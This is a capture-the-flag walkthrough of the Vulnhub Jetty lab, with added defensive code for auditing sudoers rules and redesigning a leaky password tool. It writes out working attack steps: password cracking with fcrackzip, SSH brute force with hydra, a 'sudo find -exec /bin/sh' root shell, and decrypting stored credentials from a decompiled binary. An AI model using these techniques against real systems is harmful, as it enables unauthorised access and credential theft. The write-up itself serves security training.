# Vulnhub Jetty: 1

## Lab setup

Download: https://www.vulnhub.com/entry/jetty-1,621/
## Penetration test

### Information gathering

Find the target's IP:

```
arp-scan -l
```

Port scan:

```
nmap -p- -sV -sC -A 192.168.131.134
```

Open ports:

- 21 FTP
- 80 HTTP
- 65507 SSH

The FTP service allows anonymous login.

Visit port 80, then scan for directories:

```
gobuster dir -u http://192.168.131.134 -w /usr/share/wordlists/dirb/big.txt -x php
```

robots.txt turns up; visit it.

With the usual three steps done, on to exploitation.
### Exploitation

Anonymous FTP login was found earlier, so try logging in anonymously.

`ls` returns nothing... the login succeeds, but that is all.

After some searching online:

```
wget -r ftp://192.168.131.134
```

In short, we know there is something in there; since it can't be listed, just download all of it.

Check the files:

```
cat README.txt
```

It says the zip file is encrypted, that the password is the company's default password, and that the FTP service must be shut down once the file has been read.

#### Cracking the archive password

The archive password is unknown and nothing else hints at it, so brute force is the only option:

```
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt sshpass.zip
```

Extract the archive:

```
unzip sshpass.zip
cat sshpass.txt
```

It records the SSH password: Squ1d4r3Th3B3$t0fTh3W0rLd

Port 65507 found earlier is SSH, but the username is unknown.

#### Username brute force

```
hydra -L /usr/share/wordlists/dirb/others/names.txt -p 'Squ1d4r3Th3B3$t0fTh3W0rLd' ssh://192.168.131.134:65507
```

(The password is single-quoted so the shell does not expand the `$t0fTh3W0rLd` part as a variable.)

The brute force turned up nothing; possibly the box itself does not cope well with brute-forcing.

After searching online, it turns out the box description gave a hint all along: the account Squiddie exists.

```
ssh squiddie@192.168.131.134 -p 65507
```

- Extra information: The suspicious username is Squiddie. He was in charge of the ticket selling for the Aquarium. Ethernet settings set to NAT with DHCP enabled. You should find the IP in your VLAN.
### Privilege escalation

Switch to a pty with python3:

```
python3 -c "import pty;pty.spawn('/bin/bash')"
```

The host has both python2 and python3; the same can be done from the python2 interactive prompt:

```
>>> import pty
>>> pty.spawn('/bin/bash')
```

#### sudo escalation

Check whether the current user has any sudo rights:

```
sudo -l
```

The find command can be run without a password. Use find to escalate:

```
sudo find . -exec /bin/sh \; -quit
```

Escalation succeeded.
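The root cause of this step is a sudoers rule that lets a user run a shell-capable binary as root with `NOPASSWD`. As an added example (not from the original walkthrough), the script below parses `sudo -l` output and flags exactly that pattern, so a defender can audit a host before someone else does. The sample `sudo -l` output is constructed to match what the walkthrough describes, and the `SHELL_CAPABLE` list is a short hypothetical starter set, not a complete catalogue.

```python
import os
import re

# Constructed sample of `sudo -l` output, modelled on what the walkthrough
# describes (find runnable as root without a password). Not captured from
# the real box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for squiddie on jetty:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User squiddie may run the following commands on jetty:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apt-get
"""

# Binaries that hand back a shell or arbitrary file access when run with
# elevated rights. A deliberately short, hypothetical starter list; a real
# audit would use a maintained catalogue.
SHELL_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "python",
                 "python3", "perl", "env", "bash", "sh"}

# Shape of one rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:\w+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return (runas, tags, [commands]) for each rule under 'may run the following'."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        runas, tag_blob, cmds = match.groups()
        tags = {t.rstrip(":") for t in tag_blob.split()}
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        rules.append((runas.strip(), tags, commands))
    return rules


def risky_rules(text):
    """NOPASSWD rules that run ALL or a shell-capable binary as root."""
    findings = []
    for runas, tags, commands in parse_sudo_l(text):
        run_user = runas.split(":")[0].strip()
        if "NOPASSWD" not in tags or run_user not in ("root", "ALL"):
            continue
        for cmd in commands:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append((run_user, cmd))
    return findings


if __name__ == "__main__":
    for run_user, cmd in risky_rules(SAMPLE_SUDO_L):
        print(f"RISK: {cmd} runs as {run_user} without a password")
```

Run against real output with `sudo -l | python3 audit.py` after replacing the sample with `sys.stdin.read()`; the fix for any finding is to drop `NOPASSWD`, or better, to replace the broad binary with a wrapper script that exposes only the operation the user actually needs.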
Switch to a pty again:

```
python3 -c "import pty;pty.spawn('/bin/bash')"
```

Locate root.txt with find:

```
find / -name root.txt
```

Go into /root; two files are found there:

```
cat note.txt
cat proof.txt
```
### Collecting the evidence

#### Information gathering

The goal is not only to escalate to root but also to obtain the evidence. Check the scheduled tasks:

```
crontab -l
```

It shows the script /etc/cron.daily/backup running every 2 minutes.

Got stuck here for a while...

```
cat /etc/cron.daily/backup
```

It uses rsync to synchronise files from /root/Documents/.docs to /var/backups/.docs.

```
cd /root/Documents/.docs
cd /var/backups/.docs
```

Copy the files in that directory to /home/ftp:

```
cp -r /root/Documents/.docs/. /home/ftp/docs/
```

Download the docs directory through wget (packing it into an archive first would be better):

```
wget -nH -m --ftp-user=ftp ftp://192.168.131.134/docs/
```

It needs a password to open. Look at the files in the password_keeper directory.
## database.txt

```
instagram T9Y0Ku/oDv80H8CUzBKkwQ==
facebook IXKnuKh73jCOKcEZAaHnIQ==
Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==
MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=
Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=
```

## usage.txt

```
Usage:
*Linux: wine password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)
*Windows: password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)

This program was compiled using pyinstaller.
```
To get the passwords in the table we need the password the little program asks for, so decompile the program and analyse the code. It was built with pyinstaller, so the source can be recovered with the usual tools.

#### Python decompilation

password_keeper.exe is provided as-is, so it can simply be run on Windows.

Use pyinstxtractor to unpack it; password_keeper.pyc is among the extracted files. Tool: https://github.com/extremecoders-re/pyinstxtractor

Decompile with uncompyle6 (it warns that it has to run under Python 2.6-3.8):

```
pip install uncompyle6
uncompyle6 password_keeper.pyc > ../pass.py
```

The source:
```python
# uncompyle6 version 3.9.1
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 3.9.8 (main, Nov 7 2021, 15:47:09)
# [GCC 11.2.0]
# Embedded file name: password_keeper.py
from Cryptodome.Cipher import AES
import base64
BS = 16
# PKCS#7 pad / unpad helpers
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]


def cipher_message(key, message, iv):
    message = pad(message)
    key = base64.b64decode(key)
    obj = AES.new(key, AES.MODE_CBC, iv)
    ciphertext = obj.encrypt(message)
    ciphertext = base64.b64encode(ciphertext)
    return ciphertext


def decipher_message(key, ciphertext, iv):
    ciphertext = base64.b64decode(ciphertext)
    key = base64.b64decode(key)
    obj2 = AES.new(key, AES.MODE_CBC, iv)
    decipher_text = obj2.decrypt(ciphertext)
    decipher_text = unpad(decipher_text)
    return decipher_text


def generate_key(ciphertext, tag, key, iv):
    ciphertext = cipher_message(key, ciphertext, iv)
    print ''
    print "Now copy this into your database.txt (It's the free version... pay for an automated tool!)"
    print ''
    print 'Tag Password'
    print tag + ' ' + ciphertext


def show_keys(database, key, iv):
    check_permissions = raw_input('Insert password: ')
    # the access check compares base64(input) against the AES key itself
    if base64.b64encode(check_permissions) == key:
        for i in range(len(database[0])):
            ciphertext = database[1][i]
            decipher = decipher_message(key, ciphertext, iv)
            print ' '
            print 'Tag: ' + database[0][i] + ' Password: ' + decipher
        print ' '
    else:
        print ''
        print 'Tag: Instagram Password: WRONG '
        print 'Tag: Facebook Password: PASSWORD '
        print 'Tag: SSH Password: TRY '
        print 'Tag: root Password: HARDER! '
        print ''


def read_database():
    database = [[], []]
    f = open('database.txt', 'r')
    for line in f.readlines():
        line = line.strip().split()
        database[0].append(line[0])
        database[1].append(line[1])
    f.close()
    return database


def main():
    print 'Welcome to the best password keeper ever!'
    print '__ __ _ _ __ '
    print '\\ \\ / /__ __ _| | ___ _ | |/ /___ ___ _ __ ___ _ __ '
    print " \\ \\ /\\ / / _ \\/ _` | |/ / | | |_____| ' // _ \\/ _ \\ '_ \\ / _ \\ '__|"
    print ' \\ V V / __/ (_| | <| |_| |_____| . \\ __/ __/ |_) | __/ | '
    print ' \\_/\\_/ \\___|\\__,_|_|\\_\\__, | |_|\\_\\___|\\___| .__/ \\___|_| '
    print ' |___/ |_| '
    # IV and AES key are hardcoded in the binary
    iv = '166fe2294df5d0f3'
    key = 'N2FlMjE4ZmYyOTI4ZjZiMg=='
    database = read_database()
    loop = True
    while loop:
        print ''
        print 'Choose what you want to do: '
        print '1) See your passwords!'
        print '2) Generate a cipher-password'
        print '3) Close'
        option = raw_input('Insert your selection here --> ')
        if option == '1':
            print ''
            print 'Showing content of your secret passwords...'
            print ''
            show_keys(database, key, iv)
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '2':
            print ''
            print ''
            title = raw_input('Type the name of the application: ')
            password = raw_input('Type the password(BEWARE OF SHOULDER SURFING!!!): ')
            generate_key(password, title, key, iv)
            print ''
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '3':
            loop = False
            print ''
            return 'Bye Byeeeeeeeeeeeee'
        else:
            print ''
            print ''
            print 'WHAT? FAILURE TO COMMUNICATE... Reseting connection...'
            print ''
            print ''
            returned = raw_input('Press any button to return to the menu...')


if __name__ == '__main__':
    print main()
# okay decompiling password_keeper.pyc
```
Entering 1 calls show_keys(), which base64-encodes the input and compares it with key. Mirroring that check, base64-decode key and the password falls out: 7ae218ff2928f6b2

```
echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d
```

With it the document passwords come out, and with them the criminal evidence:

```
Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc
```
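The weakness in the decompiled tool is that the AES key and the "master password" are the same value, embedded in the binary, so the gate in show_keys() is a base64 decode away from being bypassed. As an added example (not from the original walkthrough or the tool's author), the Python 3 code below reimplements the relevant pieces: the padding and database parsing, the original check and its trivial inversion, an AES-CBC decrypt that mirrors decipher_message() (pycryptodomex, the same dependency the original imports, is only needed for that one function), and, for contrast, a hardened design in which nothing secret ships with the program: the key is derived from the user's password with a salted PBKDF2 and only a verifier is stored. The key, IV and database.txt contents are the ones on this page; the salt and test password in the hardened part are constructed.

```python
import base64
import hashlib
import hmac

# Constants lifted from the decompiled password_keeper.py on this page.
EMBEDDED_KEY_B64 = "N2FlMjE4ZmYyOTI4ZjZiMg=="
EMBEDDED_IV = b"166fe2294df5d0f3"
BS = 16

# database.txt content as recovered from the backup directory on this page.
DATABASE_TXT = """\
instagram T9Y0Ku/oDv80H8CUzBKkwQ==
facebook IXKnuKh73jCOKcEZAaHnIQ==
Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==
MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=
Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=
"""


def pad(data: bytes) -> bytes:
    """PKCS#7 padding, the same scheme the decompiled tool applies."""
    n = BS - len(data) % BS
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    """Inverse of pad(); unlike the original's s[:-ord(s[-1])], it validates."""
    n = data[-1] if data else 0
    if not 1 <= n <= BS or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return data[:-n]


def read_database(text: str):
    """Parse 'tag base64ciphertext' lines into parallel lists, as the tool does."""
    tags, blobs = [], []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            tags.append(parts[0])
            blobs.append(parts[1])
    return tags, blobs


def original_check(candidate: str, key_b64: str) -> bool:
    """The tool's access gate: base64(input) == embedded key.

    The AES key and the master password are therefore the same secret, and
    that secret ships inside the binary.
    """
    return base64.b64encode(candidate.encode()) == key_b64.encode()


def recover_master_password(key_b64: str) -> str:
    """Anyone holding the binary inverts the gate with one base64 decode."""
    return base64.b64decode(key_b64).decode()


def decrypt_entry(blob_b64: str, key_b64: str = EMBEDDED_KEY_B64,
                  iv: bytes = EMBEDDED_IV) -> str:
    """AES-128-CBC decrypt of one database value; mirrors decipher_message().

    Needs pycryptodomex, so the import is deferred: every other function in
    this file runs without it.
    """
    from Cryptodome.Cipher import AES
    key = base64.b64decode(key_b64)
    ct = base64.b64decode(blob_b64)
    return unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ct)).decode()


# Hardened design for comparison: nothing secret is embedded. The key is
# derived from the user's password with a salted, slow KDF, and only a hash of
# the derived key is stored as the verifier (salt and verifier go in the
# database file, the key never does).
def derive_key(password: str, salt: bytes, iterations: int = 200_000) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=16)


def make_verifier(password: str, salt: bytes) -> bytes:
    return hashlib.sha256(derive_key(password, salt)).digest()


def check_password(password: str, salt: bytes, verifier: bytes) -> bool:
    return hmac.compare_digest(make_verifier(password, salt), verifier)


if __name__ == "__main__":
    print("embedded key decodes to the master password:",
          recover_master_password(EMBEDDED_KEY_B64))
    tags, blobs = read_database(DATABASE_TXT)
    for tag, blob in zip(tags, blobs):
        try:
            print(f"Tag: {tag} Password: {decrypt_entry(blob)}")
        except ImportError:
            print(f"Tag: {tag} (install pycryptodomex to decrypt)")
```

The contrast is the point: in the original, recovering the key from the binary also recovers the password, and recovering the password also recovers the key, because they are one string. With a derived key and a stored verifier, the binary and the database together still reveal nothing about the password beyond what an offline guessing attack at 200,000 PBKDF2 iterations per guess can get, and a wrong padding byte raises instead of silently truncating.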